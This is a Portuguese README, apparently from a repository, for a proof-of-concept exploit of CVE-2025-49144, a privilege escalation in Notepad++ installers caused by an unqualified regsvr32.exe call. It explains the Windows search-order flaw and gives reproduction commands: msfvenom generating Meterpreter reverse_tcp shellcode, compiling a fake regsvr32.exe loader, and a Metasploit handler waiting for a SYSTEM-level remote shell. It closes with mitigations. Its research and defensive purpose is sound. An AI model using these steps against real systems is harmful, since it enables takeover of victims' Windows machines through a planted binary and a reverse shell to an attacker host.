
PoC do CVE-2025-49144 para pesquisadores de segurança testarem e experimentarem.

📌 CVE-2025-49144 é uma vulnerabilidade de escalada de privilégios local de alta gravidade encontrada nos instaladores do Notepad++ v8.8.1 e versões anteriores. Esta vulnerabilidade decorre do comportamento não controlado do caminho de busca de executáveis durante a instalação, permitindo que um atacante local obtenha privilégios de nível SYSTEM ao colocar executáveis maliciosos no mesmo diretório do instalador.
⚙️ Como o CVE funciona – Passo a passo:
🧱 1. O que deu errado no instalador?
O instalador do Notepad++ (anterior à v8.8.2) chama regsvr32.exe para registrar alguns componentes — mas o faz sem fornecer o caminho completo (como C:\Windows\System32\regsvr32.exe).
Em vez disso, ele apenas executa:
regsvr32.exe some_dll
📂 2. Comportamento do caminho de busca do Windows: Quando um executável é iniciado sem um caminho completo, o Windows usa uma ordem de busca específica para encontrar o arquivo:
A pasta a partir da qual o aplicativo foi iniciado (ex.: Downloads)
A pasta do sistema (System32)
A pasta do Windows
O diretório de trabalho atual
Os caminhos na variável de ambiente PATH
Então, se um regsvr32.exe falso for colocado na mesma pasta do instalador (ex.: Downloads), o Windows o usará antes do real.
💣 3. Exploração:
- O atacante coloca um regsvr32.exe malicioso na mesma pasta do instalador legítimo do Notepad++ (ex.: na pasta Downloads da vítima).
- A vítima executa o instalador (pensando que é seguro).
- O instalador chama regsvr32.exe, mas acaba executando o malicioso da mesma pasta — com privilégios de SYSTEM (porque instaladores normalmente solicitam permissões de administrador).
- O payload do atacante agora está sendo executado como NT AUTHORITY\SYSTEM.
⚙️ Passos para Reproduzir:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<your-ip> LPORT=4444 -f c > shellcode.txt
x86_64-w64-mingw32-gcc regsvr32_loader.c -o regsvr32.exe -mwindows
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST X.X.X.X
set LPORT 4444
run
Nota: Este é um PoC e, portanto, foi testado com o Windows Defender e a proteção em tempo real desativados.
✅ Mitigação
Usuários e administradores devem:
Atualizar para o Notepad++ v8.8.2 ou posterior
Restringir a instalação de software a administradores confiáveis
Usar AppLocker, WDAC ou Políticas de Restrição de Software (SRP) para:
As equipes de segurança devem auditar regularmente os caminhos de instalação, monitorar permissões de gravação e observar o comportamento durante a execução do instalador para reduzir a superfície de ataque.
Licença MIT — Gratuito apenas para fins educacionais, de pesquisa e defensivos.
Pull Requests são bem-vindos — melhore a detecção, adicione recursos ou sugira correções.
Este PoC é apenas para fins educacionais e de pesquisa. Use-o por sua conta e risco. O autor não é responsável por qualquer uso indevido ou dano causado.